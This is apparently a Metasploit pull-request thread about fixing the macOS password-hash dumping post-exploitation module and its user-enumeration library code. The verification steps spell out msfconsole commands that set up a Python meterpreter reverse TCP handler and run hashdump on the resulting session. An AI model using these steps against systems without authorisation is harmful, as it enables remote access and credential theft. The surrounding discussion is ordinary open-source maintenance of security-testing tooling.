hash_dump now working properly up to Mac OS X High Sierra (10.13.6 in…

[ssh3ll]

…cluded)

This changes fix a simple issue which was preventing the module to work properly.
The initial idea was to add the support for newer Mac OS X releases. However, looks like the script works fine with the applied changes, also for the newer releases.

Initially, the script was retrieving the usernames using the ls utility. However, this behaviour may have led to several unexpected results. As an example, any file/directory stored under the /Users directory would have been considered as a regular user (which doesn't even make sense).

With the applied changes, the usernames are retrieved directly from the DirectoryService, providing a more reliable way to obtain usernames and consequently allowing the script to retrieve the correct hashes.

Verification

List the steps needed to make sure this thing works

Start 'msfconsole'

use exploit/multi/handler

set payload python/meterpreter/reverse_tcp

set lhost dummy_ip

set lport dummy_port

exploit -j

Wait for a valid Python meterpreter reverse TCP shell (assuming its spawned as 'session 1')

use post/osx/gather/hashdump

set session 1

run

[busterb]

Instead of reimplementing it, this should just call Msf::Post::OSX::System.get_users instead. That way it's using common library code, which is better tested than a one-off in a module.

[ssh3ll]

I opened another pull request 5 days ago, as acammack-r7 suggested. Days have passed, no news about the pull, now it's even labeled as "bug". Can you please explain what's going on?
I wanted to improve an existing (not working) post exploitation module for Mac OS X, can somebody explain why the original script's been committed meanwhile this simple fix has not?

[timwr]

We're sorry for the delay in getting this merged. It's marked a bug because you're fixing a bug in the module :)
I tested your fix it and works great, but we think it could be simpler. There is an existing function for getting the users here:
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/post/osx/system.rb#L69
Can you try import it e.g include Msf::Post::OSX::System and use it?
If not we can make the change for you while landing this. Thanks again and sorry for the delay.

[ssh3ll]

Of course, I can try it!
However, there's another issue into the get_nonsystem_accounts (and I assume the same problem is affecting other methods into the same class) function you suggested. The problem is due to a chomp call with an empty string as a parameter, which raises an error. Additionally, not even the 'split("\n\n")' returns what it should return, making the whole function unusable.

I hope I will be able to fix both (get_nonsystem_accounts, and post/osx/gather/hashdump) before the weekend ends. I'm going to modify this pull request for the hashdump module.
What about the core/osx/system? Do I have to open another PR or it's enough to merge it here?

Thank you (timwr and busterb) for your suggestions. Will let you know as soon as I've some news.

[timwr]

Cool @ssh3ll ! Feel free to modify lib/msf/core/post/osx/system.rb however you like in this pull request. If it works we'll merge it here. Many thanks!
With the (\n\n), potentially different payloads (e.g python/meterpreter/reverse_tcp, osx/x64//meterpreter/reverse_tcp, osx/x64/shell_reverse_tcp) may behave differently but don't worry about that for now.

[busterb]

I can go ahead and make the changes I was suggesting. Just need to test them.

[busterb]

c89d8f8 fixes bugs in the core library, making user enumeration generally more robust on High Sierra and beyond

3e61a98 updates hashdump to use these new methods

Thanks!

[busterb]

Release Notes

This updates the hashdump module to work on newer versions of macOS, while increasing the robustness of existing user enumeration functions in the core library for macOS.

[busterb]

split("\n\n") was not returning the expected value because the command as actually printing "\r\n\r\n" as though this were Windows. Since apparently this is behavior that has changed over time, I added a normalization pass first with tr so that it can expect the same string delimiters on all versions.

[busterb]

@timwr something I noticed while testing this with get_users was that python meterpreter doesn't appear to close the PTY after launching a subprocess. Running this module with lots of users makes it easy to get this error:

[-] method stdapi_sys_process_execute resulted in an error
Traceback (most recent call last):
  File "<string>", line 1363, in create_response
  File "", line 1033, in stdapi_sys_process_execute
  File "/usr/local/Cellar/python@2/2.7.15_1/Frameworks/Python.framework/Versions/2.7/lib/python2.7/pty.py", line 29, in openpty
    master_fd, slave_name = _open_terminal()
  File "/usr/local/Cellar/python@2/2.7.15_1/Frameworks/Python.framework/Versions/2.7/lib/python2.7/pty.py", line 70, in _open_terminal
    raise os.error, 'out of pty devices'
OSError: out of pty devices

[ssh3ll]

"Long" time I don't check this. Apologies for the delay and thanks to everyone.
Glad to have given some small (so far) contribute to MSF.

[busterb]

Oh, I should have pinged @zeroSteiner: there appears to be a PTY leak when running subprocesses with python meterpreter that this unveiled.